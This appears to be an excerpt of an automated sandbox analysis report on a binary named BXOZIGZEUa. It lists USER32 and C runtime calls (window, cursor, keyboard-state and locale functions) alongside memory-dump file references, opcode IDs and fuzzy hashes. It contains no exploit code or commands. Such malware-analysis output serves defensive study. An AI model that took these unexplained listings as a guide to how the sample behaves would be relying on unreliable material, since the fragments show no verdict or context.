                                                                  APIs
                                                                  • PeekMessageW.USER32(?,?,00000367,00000367,00000003), ref: 00206C1D
                                                                  • PostMessageW.USER32(?,00000367,00000000,00000000), ref: 00206C35
                                                                  • GetCapture.USER32 ref: 00206C37
                                                                  • ReleaseCapture.USER32 ref: 00206C42
                                                                  • PostMessageW.USER32(?,0000036A,00000000,00000000), ref: 00206C70
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Message$CapturePost$PeekRelease
                                                                  • String ID:
                                                                  • API String ID: 1125932295-0
                                                                  • Opcode ID: 855da26d567161444b54f484da6f2bc353b6cc67b3503dfc66ac70a4f517597c
                                                                  • Instruction ID: 6565af89d5c6178d640fbcaa56c0354c049e1c4eb533ac160c5749567e0569f9
                                                                  • Opcode Fuzzy Hash: 855da26d567161444b54f484da6f2bc353b6cc67b3503dfc66ac70a4f517597c
                                                                  • Instruction Fuzzy Hash: 7201A7711103416BE7256B30DC8DF5B76BCFB84704F50452DF5C996191EE70E8508B64
                                                                  APIs
                                                                  • ScreenToClient.USER32(?,?), ref: 0021C59E
                                                                  • SendMessageW.USER32(?,00000366,00000000,?), ref: 0021C5BA
                                                                  • ClientToScreen.USER32(?,?), ref: 0021C5C7
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0021C5D0
                                                                  • GetParent.USER32(?), ref: 0021C5DE
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: ClientScreen$LongMessageParentSendWindow
                                                                  • String ID:
                                                                  • API String ID: 4240056119-0
                                                                  • Opcode ID: 2aca15d708b9a115cc54477baab193c3e60570d48252bd45d03c5be63f83008e
                                                                  • Instruction ID: 0f877a3e4a4c0df366b0cc4e52ed3a4e28c115112977863d9c5721782d03da09
                                                                  • Opcode Fuzzy Hash: 2aca15d708b9a115cc54477baab193c3e60570d48252bd45d03c5be63f83008e
                                                                  • Instruction Fuzzy Hash: CEF0D13A19056577E3110F19AC08AEB77ADEF95771F304211FD29EA180DF70EE5182A4
                                                                  APIs
                                                                  • GetCursorPos.USER32(00000000), ref: 0020F571
                                                                  • ScreenToClient.USER32(?,00000000), ref: 0020F57E
                                                                  • PtInRect.USER32(?,00000000,00000000), ref: 0020F591
                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 0020F5B0
                                                                  • SetCursor.USER32(00000000), ref: 0020F5BC
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$ClientLoadRectScreen
                                                                  • String ID:
                                                                  • API String ID: 2747913190-0
                                                                  • Opcode ID: 79da7c3e62e3a57e05aeaff3b2b4ea3a7f57aa1e9c2ed47972ce8828cb8d771b
                                                                  • Instruction ID: ffe6ea956b43608ed2731731dbfe48e14947c74e5efefdfa143cd7906e9199c2
                                                                  • Opcode Fuzzy Hash: 79da7c3e62e3a57e05aeaff3b2b4ea3a7f57aa1e9c2ed47972ce8828cb8d771b
                                                                  • Instruction Fuzzy Hash: 81015A72950249BFDB20AFA0EC4CFAE7FB9FB08345F404429B95AD6060DB70DA50DB20
                                                                  APIs
                                                                  • GetKeyboardState.USER32(?), ref: 001F7619
                                                                  • _memset.LIBCMT ref: 001F7633
                                                                  • GetKeyboardLayout.USER32(?), ref: 001F7643
                                                                  • MapVirtualKeyW.USER32(?,00000000), ref: 001F7661
                                                                  • ToUnicodeEx.USER32(?,00000000), ref: 001F766B
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Keyboard$Exception@8H_prolog3LayoutStateThrowUnicodeVirtual_memset
                                                                  • String ID:
                                                                  • API String ID: 4204171240-0
                                                                  • Opcode ID: a0a54cfdf38ccf26c3d0806585dff6da37fc4bba74b1764db5b87674c08b6c4f
                                                                  • Instruction ID: e8e10c3dc8342980cf6de43893147dcfba3ccf24c2acc22548db053c02d7e974
                                                                  • Opcode Fuzzy Hash: a0a54cfdf38ccf26c3d0806585dff6da37fc4bba74b1764db5b87674c08b6c4f
                                                                  • Instruction Fuzzy Hash: 76016771640108BFDF10AB64ED8AFDE77ACAF14700F8140A9B645DA091DF70DA94CF54
                                                                  APIs
                                                                  • __getptd.LIBCMT ref: 002C5B67
                                                                    • Part of subcall function 002C5DC1: __getptd_noexit.LIBCMT ref: 002C5DC4
                                                                    • Part of subcall function 002C5DC1: __amsg_exit.LIBCMT ref: 002C5DD1
                                                                  • __getptd.LIBCMT ref: 002C5B7E
                                                                  • __amsg_exit.LIBCMT ref: 002C5B8C
                                                                  • __lock.LIBCMT ref: 002C5B9C
                                                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 002C5BB0
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                  • String ID:
                                                                  • API String ID: 938513278-0
                                                                  • Opcode ID: 9a7840e8045ebd46165e9b01cfaf4d3e3e3cb007c9aa5c179faca296b1ceb24a
                                                                  • Instruction ID: 2d3819ee91aaaec66f1287dfbf2831da3531e58e6c3a1c531799ed4a3547061c
                                                                  • Opcode Fuzzy Hash: 9a7840e8045ebd46165e9b01cfaf4d3e3e3cb007c9aa5c179faca296b1ceb24a
                                                                  • Instruction Fuzzy Hash: 61F06231924F319BD7617BA89806F4E2BA0AF00764F10470DF505561D6CB64FDA18E55
                                                                  APIs
                                                                    • Part of subcall function 001C7F90: std::_Lockit::_Lockit.LIBCPMT ref: 001C7FA4
                                                                    • Part of subcall function 001C6960: std::_Lockit::_Lockit.LIBCPMT ref: 001C698C
                                                                    • Part of subcall function 001C6960: std::_Lockit::_Lockit.LIBCPMT ref: 001C69AF
                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 001C53D9
                                                                  • _localeconv.LIBCMT ref: 001C544F
                                                                  • _strcspn.LIBCMT ref: 001C556A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: LockitLockit::_std::_$_localeconv_strcspn
                                                                  • String ID: e
                                                                  • API String ID: 331173946-4024072794
                                                                  • Opcode ID: 3f88a4555d92fc36daf53f98888b6aaf7c3eb0e070442ad99be655dc262e973c
                                                                  • Instruction ID: 7d6b81459fd880b8d559b800a69a390a922c9c998471592d0b08c54048addc45
                                                                  • Opcode Fuzzy Hash: 3f88a4555d92fc36daf53f98888b6aaf7c3eb0e070442ad99be655dc262e973c
                                                                  • Instruction Fuzzy Hash: 78122775E006588FCB14CFA8C881AEEBBB6BF98300F15825DE819AB355D730ED45CB94
                                                                  APIs
                                                                  • __EH_prolog3_GS.LIBCMT ref: 0026FBF6
                                                                  • IsRectEmpty.USER32(?), ref: 00270015
                                                                  • OffsetRect.USER32(?,00000000,00000001), ref: 00270051
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$EmptyH_prolog3_Offset
                                                                  • String ID: !
                                                                  • API String ID: 307044148-2657877971
                                                                  • Opcode ID: 6be4d3c1b9b5af759e864ed4eb9bc1f3526ad6a759b00dbfceac15990ef365ac
                                                                  • Instruction ID: e95cdc0934ff8f6312c7b8402c5c6e21d19d9ff5720f9ca18a7a116c0e9e7b2c
                                                                  • Opcode Fuzzy Hash: 6be4d3c1b9b5af759e864ed4eb9bc1f3526ad6a759b00dbfceac15990ef365ac
                                                                  • Instruction Fuzzy Hash: 18028D71A1021ACFCF10DFA4C985AEEBBB9FF19300F14416AE806EB255DB70A955CF50
                                                                  APIs
                                                                  • OffsetRect.USER32(-00000018,00000000,00000000), ref: 0026737F
                                                                  • __EH_prolog3.LIBCMT ref: 002673A2
                                                                  • GetSystemMetrics.USER32(00000002), ref: 0026740F
                                                                    • Part of subcall function 001DEAAD: __EH_prolog3.LIBCMT ref: 001DEAB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog3$MetricsOffsetRectSystem
                                                                  • String ID: N%
                                                                  • API String ID: 1613555380-2073099716
                                                                  • Opcode ID: 9f7b6bf70398fdadba63845cb8ac763d6bbd98886599bcca67c97c0e03c45d59
                                                                  • Instruction ID: ccfca1d22d49254f4c61ce0a5208473bcc2c8f285ee41a4f50b69de8992f6309
                                                                  • Opcode Fuzzy Hash: 9f7b6bf70398fdadba63845cb8ac763d6bbd98886599bcca67c97c0e03c45d59
                                                                  • Instruction Fuzzy Hash: 23A16A31A1074ADFCB10DFA8D889AAEB7F1FF54318F24456DE816AB251DB70A990CF50
                                                                  APIs
                                                                  • __EH_prolog3.LIBCMT ref: 00218322
                                                                  • SendMessageW.USER32(?,00000229,00000000,00000000), ref: 0021834F
                                                                  • GetWindow.USER32(?,00000005), ref: 002183B9
                                                                    • Part of subcall function 002185BF: BringWindowToTop.USER32(?), ref: 00218651
                                                                    • Part of subcall function 002185BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00218690
                                                                    • Part of subcall function 002185BF: RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 002186A0
                                                                    • Part of subcall function 001DCD55: ShowWindow.USER32(00000000,?,?,001CC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 001DCD66
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Redraw$BringH_prolog3MessageSendShow
                                                                  • String ID: 83/
                                                                  • API String ID: 603925361-2323854675
                                                                  • Opcode ID: 3a66461f6aff3f5c8178223f52b74e0bf3d3ab81805c6da7090f575bf4a04204
                                                                  • Instruction ID: 20b77bb6b1378061f0f3bb9e4dccd79879ea013c3e898e56e30e5e031be54cf9
                                                                  • Opcode Fuzzy Hash: 3a66461f6aff3f5c8178223f52b74e0bf3d3ab81805c6da7090f575bf4a04204
                                                                  • Instruction Fuzzy Hash: 5971A130A21216AFCF15AF60C8C99EDB7A6FF64B10F15446AF805AB295DF709D90CBD0
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: swprintf
                                                                  • String ID: $$%$+
                                                                  • API String ID: 233258989-3202472541
                                                                  • Opcode ID: 0fd19c34f53649e6baf91df036304a9235c57187e7201f3fa3c7b2a9c3d5ab86
                                                                  • Instruction ID: 580a705d2d44a7abe33585d34969b3bbf8b740415b922f451bd4235813bba13f
                                                                  • Opcode Fuzzy Hash: 0fd19c34f53649e6baf91df036304a9235c57187e7201f3fa3c7b2a9c3d5ab86
                                                                  • Instruction Fuzzy Hash: F9519C72A0D3005BD7199E48C9A0FEB7BE8EB65350F21994CF981932A2E775CC448BC6
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: swprintf
                                                                  • String ID: $$%$+
                                                                  • API String ID: 233258989-3202472541
                                                                  • Opcode ID: 9d68cae6fc9f3c5010d395a19cb8f3ac65804f13db4bdcf934dd42e33ca8318e
                                                                  • Instruction ID: 34ecf76c150720b6ab24fe4a70c9b189c69f5033c9464ce6e1bbd60973e59855
                                                                  • Opcode Fuzzy Hash: 9d68cae6fc9f3c5010d395a19cb8f3ac65804f13db4bdcf934dd42e33ca8318e
                                                                  • Instruction Fuzzy Hash: 29515D72A0C3005BD719AE98C9A4FFB7BE4AB75750F11994CF99283291D739CC4487C2
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FF6C2
                                                                  • GetWindowRect.USER32(?,?), ref: 001FF75F
                                                                  • IsRectEmpty.USER32(?), ref: 001FF769
                                                                    • Part of subcall function 001CACFF: __CxxThrowException@8.LIBCMT ref: 001CAD15
                                                                    • Part of subcall function 001CACFF: __EH_prolog3.LIBCMT ref: 001CAD22
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$EmptyException@8H_prolog3Throw
                                                                  • String ID: X/
                                                                  • API String ID: 2711673171-1961195256
                                                                  • Opcode ID: f7e0c945be0a190b0fc91febbbe4ecab74b7a8ae61b02e86dcee40fe0453eb6c
                                                                  • Instruction ID: 30eb7c5bee62037dde686e67d871eb78951586681d83477383f69bc57393dfe9
                                                                  • Opcode Fuzzy Hash: f7e0c945be0a190b0fc91febbbe4ecab74b7a8ae61b02e86dcee40fe0453eb6c
                                                                  • Instruction Fuzzy Hash: C7610070A0020A9FCB15DFA9C588AFEBBF5BF48340F244169E615E7250DB70AE42CB64
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$Window$Union
                                                                  • String ID: 83/
                                                                  • API String ID: 4061794321-2323854675
                                                                  • Opcode ID: a061dae1ec0f6e649b826c2580e6b16d709c6ca8437fa28f3a31331343d8425a
                                                                  • Instruction ID: c62e07164728287ca1ccee3dbe624c770a64bf6b75470d51297e08aa3ab6f71f
                                                                  • Opcode Fuzzy Hash: a061dae1ec0f6e649b826c2580e6b16d709c6ca8437fa28f3a31331343d8425a
                                                                  • Instruction Fuzzy Hash: 56415B75900209AFCB11DFA9C985CEEFBF9BF98300F24445AE506A7251DB30A995CF60
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 001FA564
                                                                  • OffsetRect.USER32(?,?,?), ref: 001FA5A0
                                                                  • FillRect.USER32(?,?), ref: 001FA5DE
                                                                    • Part of subcall function 001DEAAD: __EH_prolog3.LIBCMT ref: 001DEAB4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.000000000032D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370048129.0000000000335000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370104153.000000000033B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370131712.0000000000366000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1370154981.0000000000367000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_1c0000_BXOZIGZEUa.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$FillH_prolog3OffsetWindow
                                                                  • String ID: 2
                                                                  • API String ID: 1391168360-3001879987
                                                                  • Opcode ID: afb354ca666f2385c3a43d302357d71b8ce2c9d4f8a281d7389e74ca30f7d2da
                                                                  • Instruction ID: 700db67b727f41509f24f79a6adb872b72dd2e6faa824e2066703515051391f9
                                                                  • Opcode Fuzzy Hash: afb354ca666f2385c3a43d302357d71b8ce2c9d4f8a281d7389e74ca30f7d2da
                                                                  • Instruction Fuzzy Hash: 64413E719006199FCF01EFA8D9859EFBBBAFF49310F14046AF905EB211CB719E058BA1
                                                                  APIs
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C5F64
                                                                  • std::_Xinvalid_argument.LIBCPMT ref: 001C5F7F
                                                                  • _memmove.LIBCMT ref: 001C5FD5
                                                                    • Part of subcall function 001C6310: std::_Xinvalid_argument.LIBCPMT ref: 001C6328
                                                                    • Part of subcall function 001C6310: std::_Xinvalid_argument.LIBCPMT ref: 001C6346
                                                                    • Part of subcall function 001C6310: std::_Xinvalid_argument.LIBCPMT ref: 001C6361
                                                                    • Part of subcall function 001C6310: _memmove.LIBCMT ref: 001C63C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.1369833186.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                                                                  • Associated: 00000001.00000002.1369803154.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000001.00000002.1369998860.00000000002E8000.00000002.00000001.01000000.00000003.sdmpDownload File
